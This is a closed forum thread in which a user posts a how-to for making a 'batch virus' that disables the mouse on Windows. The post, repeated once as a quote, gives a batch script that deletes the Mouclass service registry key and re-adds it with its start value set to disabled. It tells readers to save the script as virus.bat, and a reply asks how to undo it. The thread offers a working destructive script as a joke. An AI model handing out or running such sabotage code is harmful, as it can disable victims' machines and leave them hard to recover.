🔒 Closed Make a virus that disable Mouse

Status
Not open for further replies.

airnel

Elite
I had previously posted on making different batch files like matrix effect, opening no. of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.:ROFLMAO:

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.:D
 
I had previously posted on making different batch files like matrix effect, opening no. of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.:ROFLMAO:
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------​
  • Save this file as virus.bat
  • Done you just created your virus.:D

ehh pano naman ulit paganahin? :D
 
Status
Not open for further replies.

About this Thread

  • 10
    Replies
  • 1K
    Views
  • 10
    Participants
Last reply from:
EXECUTOR

Online now

Members online
1,053
Guests online
4,726
Total visitors
5,779

Forum statistics

Threads
2,328,174
Posts
29,240,393
Members
1,159,584
Latest member
andel0912
Back
Top